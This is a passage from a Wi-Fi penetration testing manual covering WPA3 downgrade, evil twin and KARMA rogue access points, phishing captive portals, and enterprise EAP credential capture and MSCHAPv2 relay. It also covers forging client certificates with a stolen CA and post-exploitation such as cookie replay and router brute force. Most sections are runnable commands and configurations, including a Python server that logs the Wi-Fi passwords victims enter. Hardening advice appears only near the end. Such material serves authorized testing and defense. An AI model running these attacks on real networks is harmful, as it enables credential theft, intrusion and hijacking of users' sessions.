WPA3-SAE eliminates offline dictionary attacks by requiring real-time interaction with the AP for each password guess. This makes cracking computationally equivalent to guessing in real time.
Current known vulnerabilities:
| Vulnerability | Status (2024) | Exploitable? |
|---|---|---|
| Dragonblood side-channel (timing/cache) | Patched in IEEE 802.11-2020 + most vendors | No on patched hardware |
| Transition mode downgrade | Still relevant if AP supports WPA2+WPA3 | Yes, if 802.11w not enforced |
| Online brute-force | Always present (rate-limited by AP) | Slow but possible |
| PMKID extraction SAE | Not applicable — SAE doesn’t expose PMKID the same way | No |
9.2 Online Brute-Force with wacker
# 2.4 GHz channel → frequency mapping
# Ch 1=2412, Ch 6=2437, Ch 11=2462
cd ~/tools/wacker
./wacker.py \
--wordlist /usr/share/wordlists/rockyou.txt \
--ssid "TARGET_WPA3_SSID" \
--bssid <AP_BSSID> \
--interface wlan2 \
--freq 2462
# Expected rate: ~1-3 attempts/second (limited by SAE commit-confirm round trips)
# Only practical for common/short passwords
9.3 WPA3 Transition Mode Downgrade
APs running in transition mode (supporting both WPA2 and WPA3 simultaneously) are vulnerable to a downgrade attack: force the client onto WPA2 by presenting a Rogue AP that only advertises WPA2.
# Step 1: Confirm transition mode (airodump-ng or cipher analysis in Section 5)
# Look for "PSK SAE" in the ENC/AUTH columns, or AKM suite listing both 00-0f-ac-2 and 00-0f-ac-8
# Step 2: Check if 802.11w is mandatory
# If MFP Required = 1 → deauth attacks will fail → downgrade harder to execute
tshark -r ~/wifi/captures/scan-01.cap \
-Y "wlan.bssid == <BSSID> && wlan.fc.type_subtype == 8" \
-T fields -e wlan.rsn.capabilities.mfpr 2>/dev/null
# 0 = MFP optional → deauth works
# 1 = MFP mandatory → deauth fails (clients ignore unauthenticated deauth)
# Step 3: Create WPA2-only Rogue AP
cat > ~/wifi/configs/downgrade.conf << 'EOF'
interface=wlan1
driver=nl80211
hw_mode=g
channel=11
ssid=TARGET_WPA3_SSID
mana_wpaout=/root/wifi/hashes/downgrade.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=00000000
EOF
sudo hostapd-mana ~/wifi/configs/downgrade.conf
# Step 4: Deauth client if MFP is not mandatory
sudo iwconfig wlan0mon channel 11
sudo aireplay-ng -0 0 -a <REAL_AP_BSSID> -c <CLIENT_MAC> wlan0mon
# Step 5: Crack as WPA2
hcxhash2cap --hccapx=~/wifi/hashes/downgrade.hccapx -c ~/wifi/hashes/dg.pcap
hcxpcapngtool ~/wifi/hashes/dg.pcap -o ~/wifi/hashes/dg.hc22000
hashcat -a 0 -m 22000 ~/wifi/hashes/dg.hc22000 /usr/share/wordlists/rockyou.txt
10. Evil Twin & Evil Portal Attacks
10.1 Theory and Attack Models
An Evil Twin is a rogue AP that impersonates a legitimate one — same SSID, potentially same BSSID, stronger signal. Once the client connects to the rogue AP, different objectives can be achieved:
| Variant | Goal | Inner mechanism |
|---|---|---|
| Evil Twin (OPN) | MITM, traffic intercept | Client joins open fake AP |
| Evil Portal | Credential phishing | Captive portal with fake login page |
| WPA2 Evil Twin | Handshake capture | Client attempts PSK auth against fake AP |
| Enterprise Evil Twin | MSCHAPv2 / EAP credential capture | Client authenticates via EAP to attacker RADIUS |
| KARMA Attack | Target clients probing for any network | AP responds to all Probe Requests |
Deauthentication is the standard mechanism to force clients off the legitimate AP and onto the Evil Twin. It is blocked by 802.11w (MFP) when mandatory.
10.2 KARMA Attack
KARMA exploits the fact that clients actively broadcast Probe Requests for previously known networks. By responding to every probe with a matching SSID, the attacker becomes a universal AP:
hostapd-mana implements KARMA automatically. Enable it with mana_loud=1:
cat > ~/wifi/configs/karma.conf << 'EOF'
interface=wlan1
driver=nl80211
hw_mode=g
channel=6
ssid=default
# KARMA: respond to every probe request with a matching SSID
mana_loud=1
# Log connected clients
mana_credout=/root/wifi/logs/karma_clients.log
# Open network — clients connect without credentials
wpa=0
EOF
sudo hostapd-mana ~/wifi/configs/karma.conf
sudo dhclient wlan1 # or set up dnsmasq for DHCP
wifiphisher enables KARMA by default in its “Known Beacons” attack:
sudo wifiphisher --nojamming -aI wlan1
# Select "Known Beacons" scenario when prompted
10.3 Evil Twin — Automated with wifiphisher
wifiphisher automates the full Evil Twin attack chain: creates the rogue AP, runs continuous deauth jamming, and serves a customizable phishing page:
# Full attack with automatic AP selection and firmware-upgrade phishing page
sudo wifiphisher
# Specify target and interface manually
sudo wifiphisher \
-aI wlan1 \
-jI wlan0 \
-e "TARGET_SSID" \
-p firmware-upgrade \
--handshake-capture ~/wifi/captures/psk_target-01.cap
# Available built-in scenarios:
# firmware-upgrade → fake firmware update page (requests WPA password)
# oauth-login → fake social login page
# wifi_connect → fake "reconnect to wifi" page
# browser-plugin-update → fake browser plugin update
# plugin_update → generic software update
# Custom phishing page
sudo wifiphisher \
-aI wlan1 \
-jI wlan0 \
-e "TARGET_SSID" \
-p /path/to/custom/phishing/scenario/
How wifiphisher works:
- Scans for target AP
- Creates Evil Twin with same SSID (optionally same BSSID)
- Continuously sends deauthentication frames from wlan0 (jamming interface)
- Victim’s device reconnects to the stronger/only visible AP (the Evil Twin)
- Victim is served the phishing page when they attempt to browse
- Credentials are captured and displayed in the terminal
10.4 Evil Portal — Automated with fluxion
fluxion captures the WPA2 handshake first, then uses it to verify credentials entered in the captive portal (only accepts the correct password):
cd ~/tools/fluxion
sudo bash fluxion.sh
# Interactive menu:
# 1. Select attack: "Handshake Snooper" (captures handshake first)
# 2. Select target AP from the scan list
# 3. Capture handshake (waits for or forces reconnection)
# 4. Switch to "Captive Portal" attack
# 5. Select portal template (or use custom)
# 6. fluxion launches:
# - Rogue AP on wlan1
# - Deauth jamming from wlan0
# - DHCP + DNS server pointing all traffic to the portal
# - Web server serving the phishing page
# 7. When victim enters the correct password:
# fluxion verifies it against the captured handshake
# → Only the real password is accepted and displayed
10.5 Manual Evil Portal Setup
For full control and custom scenarios:
# ─── Step 1: Set up the Rogue AP ──────────────────────────────────────────
cat > ~/wifi/configs/evil_portal_ap.conf << 'EOF'
interface=wlan1
driver=nl80211
ssid=TARGET_SSID
hw_mode=g
channel=6
macaddr_acl=0
ignore_broadcast_ssid=0
EOF
sudo hostapd ~/wifi/configs/evil_portal_ap.conf &
# ─── Step 2: Configure IP and DHCP ───────────────────────────────────────
sudo ip addr add 192.168.99.1/24 dev wlan1
sudo ip link set wlan1 up
cat > /tmp/dnsmasq_portal.conf << 'EOF'
interface=wlan1
dhcp-range=192.168.99.10,192.168.99.100,12h
dhcp-option=3,192.168.99.1
dhcp-option=6,192.168.99.1
server=8.8.8.8
log-queries
log-dhcp
# Redirect all DNS to our portal
address=/#/192.168.99.1
EOF
sudo dnsmasq -C /tmp/dnsmasq_portal.conf
# ─── Step 3: NAT / iptables for traffic routing ───────────────────────────
sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT
# Redirect HTTP to our portal
sudo iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 80 \
-j DNAT --to-destination 192.168.99.1:80
sudo iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 443 \
-j DNAT --to-destination 192.168.99.1:80
# ─── Step 4: Serve the phishing page (Python example) ────────────────────
# Place your portal HTML in /tmp/portal/
mkdir -p /tmp/portal
cat > /tmp/portal/index.html << 'HTMLEOF'
<!DOCTYPE html>
<html>
<head><title>Network Login Required</title></head>
<body>
<h2>Please re-enter your Wi-Fi password to continue</h2>
<form method="POST" action="/capture">
Password: <input type="password" name="pwd">
<input type="submit" value="Connect">
</form>
</body>
</html>
HTMLEOF
# Simple capture server with Python
python3 -c "
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
with open('/tmp/portal/index.html','rb') as f:
self.wfile.write(f.read())
def do_POST(self):
length = int(self.headers['Content-Length'])
data = parse_qs(self.rfile.read(length).decode())
pwd = data.get('pwd', [''])[0]
print(f'[+] CAPTURED PASSWORD: {pwd}')
open('/root/wifi/logs/portal_creds.txt','a').write(pwd+'\n')
self.send_response(302)
self.send_header('Location','http://google.com')
self.end_headers()
def log_message(self, *a): pass
HTTPServer(('0.0.0.0', 80), Handler).serve_forever()
" &
# ─── Step 5: Deauth clients from the legitimate AP ────────────────────────
sudo iwconfig wlan0mon channel 6
sudo aireplay-ng -0 0 -a <REAL_AP_BSSID> wlan0mon
10.6 eaphammer for Enterprise Evil Portal
cd ~/tools/eaphammer
# Captive portal phishing (for clients probing open networks)
sudo killall dnsmasq 2>/dev/null
python3 ./eaphammer \
--essid "Airport_WiFi" \
--interface wlan4 \
--captive-portal
# In parallel: deauth from the client's real AP
sudo iwconfig wlan0mon channel <CHANNEL>
sudo aireplay-ng -0 0 wlan0mon \
-a <REAL_AP_BSSID> \
-c <TARGET_CLIENT_MAC>
# Hostile portal (forces NTLM auth from Windows/macOS clients automatically)
python3 ./eaphammer \
--essid "Coffee_Shop_WiFi" \
--interface wlan2 \
--hostile-portal
# Extract NTLMv2 hashes from Responder logs
cat ~/tools/eaphammer/logs/Responder-Session.log | \
grep "NTLMv2" | awk '{print $NF}' > ~/wifi/hashes/ntlm.hc5600
hashcat -a 0 -m 5600 ~/wifi/hashes/ntlm.hc5600 \
/usr/share/wordlists/rockyou.txt
11. WPA2/3-Enterprise (MGT) — Reconnaissance
11.1 Goals
Enterprise recon collects intelligence that directly enables or improves attacks:
- EAP identities in cleartext → usernames and AD domain before the TLS tunnel opens
- Server TLS certificate → domain info, CA name, email, hostname
- Supported EAP methods → determine which attack path is available
- MFP status → determines whether deauth is possible
- Client behavior → which clients verify certs (immune to basic Rogue AP)
11.2 Capturing EAP Identities in Cleartext
In PEAP and EAP-TTLS, the EAP Identity Response (sent before the TLS tunnel) contains the username in plaintext. This is a design feature, not a bug — but it leaks domain information:
# Capture on the enterprise AP channel
sudo airodump-ng wlan0mon -c <CHANNEL> --wps \
-w ~/wifi/captures/ent_recon
# Method 1: tshark real-time extraction
tshark -r ~/wifi/captures/ent_recon-01.cap \
-Y "(eap && wlan.ra == <AP_BSSID>) && (eap.identity)" \
-T fields \
-e wlan.sa \
-e eap.identity \
2>/dev/null
# Method 2: Wireshark filter
# eap && eap.code == 2
# Then look for Type: Identity packets
# Method 3: wifi_db
python3 ~/tools/wifi_db/wifi_db.py \
-d ~/wifi/enterprise.sqlite ~/wifi/captures/
sqlite3 ~/wifi/enterprise.sqlite \
"SELECT DISTINCT Identity, Station FROM Identities;"
Typical output:
64:32:a8:ba:6c:41 CONTOSO\juan.garcia
64:32:a8:07:6c:40 anonymous ← identity hiding enabled (EAP-TTLS well-configured)
11.3 Extracting the Server TLS Certificate
The RADIUS server’s certificate is transmitted in cleartext — any passive observer can read it. This reveals the internal PKI:
# Full certificate details
tshark -r ~/wifi/captures/ent_recon-01.cap \
-Y "wlan.bssid == <AP_BSSID> && ssl.handshake.type == 11" \
-V 2>/dev/null | \
grep -E -A1 "rdnSequence|commonName|organizationName|emailAddress|dNSName|serialNumber"
# Concise: only string fields (CN, O, email, SAN)
tshark -r ~/wifi/captures/ent_recon-01.cap \
-Y "wlan.bssid == <AP_BSSID> && x509sat.IA5String" \
-T fields -e x509sat.IA5String 2>/dev/null | sort -u
# Wireshark filter
# (wlan.sa == <AP_BSSID>) && (tls.handshake.certificate)
What to extract and why:
Subject CN→ RADIUS server hostname → for cloning the cert (matching CN)Issuer CN→ CA name → for building a trusted fake certemailAddress→ contact for the admin, potential username formatO/OU→ organization/department name → AD domain cluesSAN dNSName→ internal hostnames → network topology
11.4 EAP Method Enumeration with EAP_buster
cd ~/tools/EAP_buster
# Enumerate every EAP type supported by the AP
# This tells you: does the AP support EAP-TLS only? PEAP? EAP-TTLS? LEAP?
bash ./EAP_buster.sh "ENTERPRISE_SSID" "DOMAIN\username" wlan1
# Example output:
# [+] Checking EAP-MD5 ... REJECTED
# [+] Checking EAP-GTC ... REJECTED
# [+] Checking LEAP ... REJECTED
# [+] Checking EAP-TLS ... ACCEPTED ← requires client certificate
# [+] Checking PEAP ... ACCEPTED ← MSCHAPv2 inside TLS tunnel
# [+] Checking EAP-TTLS ... ACCEPTED
# [+] Checking EAP-TTLS/PAP ... ACCEPTED ← cleartext password inside tunnel!
Impact:
- Only EAP-TLS → must steal or forge a client certificate
- PEAP accepted → Rogue AP attack to get MSCHAPv2 hash
- EAP-TTLS/PAP accepted → Rogue AP captures cleartext password
- LEAP accepted → trivially crackable
12. WPA2/3-Enterprise (MGT) — Attacks
12.1 Rogue AP to Capture MSCHAPv2 Credentials
Clients that do not verify the RADIUS server certificate will authenticate against any AP with the matching SSID. The attacker’s RADIUS server captures the MSCHAPv2 challenge-response pair:
# Step 1: Create a certificate matching the real server's fields (from recon)
cd ~/tools/eaphammer
python3 ./eaphammer --cert-wizard
# Enter: country, state, city, organization, CN ← use exact values from real cert
# Step 2: Launch the Rogue AP
python3 ./eaphammer \
-i wlan3 \
--auth wpa-eap \
--essid "ENTERPRISE_SSID" \
--creds \
--negotiate balanced
# --negotiate balanced: try multiple EAP methods in order
# Step 3: Deauth target client(s) from the real AP(s)
# If there are two APs on the same SSID, deauth from both simultaneously
sudo iwconfig wlan0mon channel <CHANNEL>
sudo aireplay-ng -0 0 -a <REAL_AP_1_BSSID> -c <CLIENT_MAC> wlan0mon
# Second interface for the second AP (if needed)
sudo airmon-ng start wlan1
sudo iwconfig wlan1mon channel <CHANNEL>
sudo aireplay-ng -0 0 -a <REAL_AP_2_BSSID> -c <CLIENT_MAC> wlan1mon
# Step 4: Wait for connection
# eaphammer output:
# [*] Sending EAP-TLS Start...
# [!] Alert: unknown ca ← client verifies certs, NOT vulnerable to this method
# [*] Captured credentials for DOMAIN\user: hash...
# Step 5: Crack MSCHAPv2 hash
grep -i "hashcat" ~/tools/eaphammer/logs/hostapd-eaphammer.log | \
awk '{print $3}' > ~/wifi/hashes/mschapv2.hc5500
hashcat -a 0 -m 5500 ~/wifi/hashes/mschapv2.hc5500 \
/usr/share/wordlists/rockyou.txt
12.2 Online Credential Brute-Force with air-hammer
When a username is known (from the EAP identity phase), attempt dictionary-based authentication directly against the AP:
cd ~/tools/air-hammer
# Single user dictionary attack
echo 'CONTOSO\juan.garcia' > ~/wifi/target_user.txt
./air-hammer.py \
-i wlan3 \
-e "ENTERPRISE_SSID" \
-p /usr/share/wordlists/rockyou.txt \
-u ~/wifi/target_user.txt
# Password spray: known password, multiple users
# Build user list with domain prefix
awk '{print "CONTOSO\\" $1}' \
/usr/share/seclists/Usernames/top-usernames-shortlist.txt \
> ~/wifi/users_contoso.txt
./air-hammer.py \
-i wlan4 \
-e "ENTERPRISE_SSID" \
-P "Summer2024!" \
-u ~/wifi/users_contoso.txt
12.3 MSCHAPv2 Relay with wpa_sycophant
MSCHAPv2 uses a challenge-response model. An attacker can relay the challenge from the real RADIUS server to the real client and relay the client’s response back — authenticating as the victim without knowing the password. This is an MITM relay, not a crack:
# Step 1: Set a controlled MAC for the Rogue AP
sudo systemctl stop NetworkManager
sudo airmon-ng stop wlan1mon
sudo ip link set wlan1 down
sudo macchanger -m F0:9F:C2:00:AA:01 wlan1
sudo ip link set wlan1 up
# Step 2: Configure wpa_sycophant (acts as the real client toward the real RADIUS)
cat > ~/tools/wpa_sycophant/sycophant.conf << 'EOF'
network={
ssid="ENTERPRISE_SSID"
scan_ssid=1
key_mgmt=WPA-EAP
identity=""
anonymous_identity=""
password=""
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
bssid_blacklist=F0:9F:C2:00:AA:01
}
EOF
# Step 3: Raise the Rogue AP linked to wpa_sycophant (Shell 1)
cd ~/tools/berate_ap
./berate_ap \
--eap \
--mana-wpe \
--wpa-sycophant \
--mana-credout ~/wifi/logs/relay_creds.log \
wlan1 lo "ENTERPRISE_SSID"
# Step 4: Deauth a vulnerable client (Shell 2)
sudo airmon-ng start wlan0
sudo iwconfig wlan0mon channel <CHANNEL>
sudo aireplay-ng -0 0 wlan0mon \
-a <REAL_AP_BSSID> \
-c <VULNERABLE_CLIENT_MAC>
# Step 5: Start relay (Shell 3)
cd ~/tools/wpa_sycophant
./wpa_sycophant.sh -c sycophant.conf -i wlan3
# When the victim connects to berate_ap, sycophant authenticates to the real RADIUS
# using the victim's identity and relayed challenge-response
# Step 6: Get an IP (Shell 4)
sudo dhclient wlan3 -v
# Troubleshooting: if relay fails, try alternate phase1
# Edit sycophant.conf: phase1="peapver=1"
13. Advanced Enterprise Attacks
13.1 Rogue AP with the Stolen Real Certificate
When access to the internal network has been established (via relay or other means), the RADIUS CA certificate and server certificate may be exfiltrated. With the real certificate, even clients that enforce certificate validation will connect:
# Step 1: Retrieve certificates from the internal web server
wget -r -A "*.crt,*.pem,*.key,*.cer" http://192.168.X.1/pki/
# Step 2: Import into eaphammer
cd ~/tools/eaphammer
python3 ./eaphammer --cert-wizard import \
--server-cert /path/to/server.crt \
--ca-cert /path/to/ca.crt \
--private-key /path/to/server.key \
--private-key-passwd <key_passphrase>
# Step 3: Launch Rogue AP with real certificate
python3 ./eaphammer \
-i wlan4 \
--auth wpa-eap \
--essid "ENTERPRISE_SSID" \
--creds \
--negotiate balanced
# Step 4: Deauth target clients from both real APs
sudo aireplay-ng -0 0 -a <REAL_AP_BSSID_1> -c <CLIENT_MAC> wlan0mon
# Clients that previously rejected fake cert will now connect
Alternative: berate_ap with real certificate:
# Convert to PEM format if needed
openssl x509 -in ca.crt -out ~/wifi/certs/hostapd.ca.pem -outform PEM
openssl x509 -in server.crt -out ~/wifi/certs/hostapd.cert.pem -outform PEM
openssl rsa -in server.key -out ~/wifi/certs/hostapd.key.pem
openssl dhparam -out ~/wifi/certs/hostapd.dh.pem 2048
cd ~/tools/berate_ap
./berate_ap \
--eap \
--mana-wpe \
--wpa-sycophant \
--mana-credout ~/wifi/logs/real_cert_creds.log \
wlan4 lo "ENTERPRISE_SSID" \
--eap-cert-path ~/wifi/certs/
13.2 Forging a Client Certificate (EAP-TLS)
If the AP only accepts EAP-TLS (certificate-based authentication), and you have obtained the CA key, you can generate a valid client certificate:
cd ~/wifi/certs/
# Generate client private key
openssl genrsa -out client.key 2048
# Create CSR — use domain user format in CN
cat > client.conf << 'EOF'
[req]
default_bits = 2048
prompt = no
distinguished_name = dn
[dn]
C = US
ST = State
L = City
O = CONTOSO
CN = CONTOSO\GlobalAdmin
emailAddress = admin@contoso.local
EOF
openssl req -config client.conf -new -key client.key -out client.csr
# Sign with the stolen CA
openssl x509 -days 730 \
-CA ca.crt \
-CAkey ca.key \
-CAserial ca.serial \
-in client.csr \
-req \
-out client.crt
# Connect using EAP-TLS
cat > ~/wifi/configs/eap_tls.conf << 'EOF'
network={
ssid="ENTERPRISE_SSID"
scan_ssid=1
proto=RSN
key_mgmt=WPA-EAP
auth_alg=OPEN
eap=TLS
identity="CONTOSO\GlobalAdmin"
ca_cert="/root/wifi/certs/ca.crt"
client_cert="/root/wifi/certs/client.crt"
private_key="/root/wifi/certs/client.key"
private_key_passwd="keypassword"
}
EOF
sudo wpa_supplicant -Dnl80211 -i wlan4 -c ~/wifi/configs/eap_tls.conf -B
sudo dhclient wlan4 -v
14. Post-Exploitation
14.1 Internal Network Discovery
# Identify your IP, gateway, and subnet
ip addr show wlan3
ip route
# Discover live hosts on the local segment
sudo arp-scan -I wlan3 -l
# Verify client isolation
# If arp-scan shows other client IPs → isolation is NOT enforced
curl -s http://<OTHER_CLIENT_IP>
# Port scan the gateway/AP
nmap -sV -p 22,23,80,443,8080,8443 <GATEWAY_IP>
# Full subnet sweep
nmap -sn 192.168.X.0/24
14.2 Session Cookie Hijacking
# From a decrypted capture, extract session cookies
tshark -r ~/wifi/captures/target-01-dec.cap \
-Y "http.cookie" \
-T fields \
-e ip.src -e http.host -e http.cookie \
2>/dev/null
# Or from live capture on an open network
tshark -i wlan2 \
-Y "http.cookie" \
-T fields \
-e ip.src -e http.host -e http.cookie \
2>/dev/null
# Replay cookie with curl
curl -H "Cookie: session=<STOLEN_COOKIE>" http://<TARGET_IP>/
14.3 Gateway/AP Admin Panel Access
# Identify the AP admin interface
nmap -sV -p 80,443,8080,8443 <GATEWAY_IP>
# Test default credentials
curl -s -o /dev/null -w "%{http_code}" \
http://<GATEWAY_IP>/ \
-u admin:admin
# Common default credentials to try:
# admin:admin, admin:password, admin:(empty)
# admin:1234, root:root, admin:admin123
# (check vendor-specific defaults based on MAC OUI)
# Lightweight credential brute-force against HTTP Basic Auth
hydra -l admin -P /usr/share/wordlists/fasttrack.txt \
http-get://<GATEWAY_IP>/ -t 4 -V
15. Detection & Defense (WIDS)
15.1 Wireless Intrusion Detection
A WIDS monitors RF for anomalous 802.11 behavior:
| Alert Type | Triggered By | Attacker Action |
|---|---|---|
| Deauth flood | Spike in type-0xC mgmt frames | Deauth attack, Evil Twin prep |
| Rogue AP | Unknown BSSID with known SSID | Evil Twin |
| PMKID harvesting | Association flood from single MAC | hcxdumptool aggressive mode |
| Beacon flood | MDK4 beacon flooding | DoS/confusion |
| EAP anomaly | Identity leakage, method enumeration | Enterprise recon |
| MFP violation | Unprotected mgmt frames to MFP-capable clients | Deauth bypass attempt |
15.2 Nzyme WIDS
Access the Nzyme web interface:
http://127.0.0.1:22900/
Default credentials: admin / (configured at setup)
Navigation:
- Dashboard → overview of monitored networks and recent alerts
- Alerts → chronological list of detected anomalies with source MAC
- Networks → AP inventory
- Clients → observed client list
- Dot11 Frames → raw frame statistics per type
15.3 Hardening Recommendations
WPA2-Personal networks:
- Use WPA3-SAE if all devices support it
- Passphrase: 20+ random characters (avoid dictionary words)
- Enable 802.11w (MFP) — blocks deauthentication attacks
- Disable WPS — eliminates PIN brute-force and Pixie Dust
- Isolate clients (AP isolation) — prevents lateral movement
- Segment with VLANs: corporate / IoT / guest
- Monitor with WIDS
WPA2/3-Enterprise networks:
- Force server certificate validation on all clients (CA pinning)
- Prefer EAP-TLS over PEAP/EAP-TTLS — eliminates password-based attacks
- Enable 802.11w (MFP) — mandatory on WPA3
- Disable weak EAP methods: EAP-MD5, LEAP, EAP-FAST without PAC
- Restrict to one EAP method (minimize attack surface)
- Deploy WIDS with Rogue AP detection
- Use NAC to enforce client posture
- Rotate RADIUS certificates regularly
- Monitor for EAP identity leakage — consider anonymous outer identity
Secure wpa_supplicant client configuration (Enterprise):
network={
ssid="CORP_WIFI"
key_mgmt=WPA-EAP
eap=PEAP
identity="DOMAIN\username"
password="strongpassword"
ca_cert="/etc/ssl/certs/corp-ca.pem"
# CRITICAL: enforce server cert validation
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
# Lock to specific RADIUS server CN — prevents Rogue AP
subject_match="/CN=radius01.corp.local"
# Or use altsubject_match for SAN fields:
# altsubject_match="DNS:radius01.corp.local"
}
16. Tool Reference
Core Aircrack-ng Suite
| Tool | Purpose | Key Flags |
|---|---|---|
airmon-ng | Monitor mode management | start wlan0, stop wlan0mon, check kill |
airodump-ng | Passive capture & scan | -c <ch>, --bssid, -w, --band abg, --wps, --manufacturer |
aireplay-ng | Frame injection | -0 deauth, -1 fake auth, --arpreplay |
aircrack-ng | WEP/WPA crack | -w <wordlist>, handshake validation |
airdecap-ng | Traffic decryption | -e <ssid>, -p <pass>, -w <wep_key> |
besside-ng | Automated WEP crack | -c <ch>, -b <bssid> |
hcxtools Suite (PMKID / Modern WPA)
| Tool | Purpose | Key Usage |
|---|---|---|
hcxdumptool | Capture PMKID + handshakes | -i wlan0mon, --enable_status=3, --filterlist_ap |
hcxpcapngtool | Convert pcapng → hash | -o hash.hc22000, --info=stdout |
hcxhash2cap | Convert hccapx → pcap | --hccapx=file.hccapx -c out.pcap |
hcxhashtool | Hash manipulation / filtering | --info |
Rogue AP / Evil Twin
| Tool | Purpose | Notes |
|---|---|---|
wifiphisher | Automated Evil Twin + Evil Portal | Best for PSK phishing; KARMA built-in |
fluxion | Evil Twin + portal with handshake verification | Verifies password before showing success |
hostapd-mana | Rogue AP, PSK capture, KARMA | Extensible, scriptable |
eaphammer | Enterprise Evil Twin (EAP cred harvest) | Captive portal, hostile portal, cert wizard |
berate_ap | Advanced Rogue AP for relay attacks | Integrates with wpa_sycophant |
wpa_sycophant | MSCHAPv2 relay | Requires berate_ap as front-end |
Enterprise Tools
| Tool | Purpose | Notes |
|---|---|---|
air-hammer | EAP brute-force / password spray | Online; slow; targeted |
EAP_buster | EAP method enumeration | Reveals supported auth types |
asleap | LEAP/MSCHAPv2 crack | Offline hash cracker |
Analysis
| Tool | Purpose | Notes |
|---|---|---|
wireshark | GUI packet analysis + decryption | Full 802.11 + TLS decode |
tshark | CLI packet analysis | Scriptable, batch processing |
wifi_db | Capture aggregation DB | SQLite, good for large engagements |
macchanger | MAC address manipulation | -r random, -m specific, -p restore |
arp-scan | Local network discovery | -l local range, -I interface |
hashcat Mode Reference
22000 WPA-PBKDF2-PMKID+EAPOL ← CURRENT STANDARD (replaces 2500/16800)
22001 WPA-PMK-PMKID+EAPOL
5500 NetNTLMv1 / MSCHAPv2 ← Enterprise EAP captures
5600 NetNTLMv2 ← Hostile portal (Responder)
1000 NTLM ← Pass-the-hash scenarios
Attack → Protocol Matrix
Protocol │ Passive Sniff │ Handshake │ PMKID │ Online BF │ Rogue AP │ Relay
─────────────────┼───────────────┼───────────┼───────┼───────────┼──────────┼───────
OPN │ YES │ n/a │ n/a │ n/a │ YES │ n/a
OWE │ NO* │ n/a │ n/a │ n/a │ YES │ n/a
WEP │ YES │ n/a │ n/a │ n/a │ NO │ n/a
WPA2-PSK │ YES† │ YES │ YES │ NO │ YES │ n/a
WPA3-SAE │ NO │ NO │ NO │ YES │ YES‡ │ n/a
WPA2-Enterprise │ YES§ │ n/a │ n/a │ YES │ YES │ YES
WPA3-Enterprise │ YES§ │ n/a │ n/a │ NO │ YES¶ │ YES
─────────────────┴───────────────┴───────────┴───────┴───────────┴──────────┴───────
* OWE encrypts per-client but AP is unauthenticated → Evil Twin captures plaintext
† Requires client association (handshake) or PMKID (clientless)
‡ WPA3 transition mode only; full WPA3 SAE rogue AP → online brute-force only
§ EAP identity and TLS cert visible; inner credentials only if client doesn't verify cert
¶ Requires stolen real certificate for cert-verifying clients
Last updated: February 2026 — For use in authorized assessments and controlled lab environments only.
Sources: